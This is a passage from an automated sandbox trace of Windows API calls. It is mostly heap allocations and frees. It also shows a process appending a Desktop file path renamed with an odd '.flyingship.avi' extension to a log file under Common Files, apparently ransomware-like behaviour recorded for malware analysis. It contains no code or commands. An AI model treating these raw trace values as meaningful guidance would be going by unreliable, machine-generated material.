(in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.688] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0076.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0076.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x110) returned 0x6b9e98 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.689] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.689] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.690] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.690] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.690] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0076.691] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.691] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0076.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.691] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0076.691] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x42a, lpOverlapped=0x0) returned 1 [0076.691] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0076.691] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x42a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.691] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0076.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0076.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x48) returned 0x76f100 [0076.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi\r\n", cchWideChar=72, lpMultiByteStr=0x76f100, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 72 [0076.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0076.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0076.692] WriteFile (in: hFile=0x128, lpBuffer=0x6d34d8*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d34d8*, lpNumberOfBytesWritten=0x61eef4*=0x47, lpOverlapped=0x0) returned 1 [0076.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.692] CloseHandle (hObject=0x128) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.693] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0076.693] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0076.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0076.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.695] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0076.695] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.695] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.695] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0076.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e708 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0076.696] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.697] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0076.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0076.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.879] 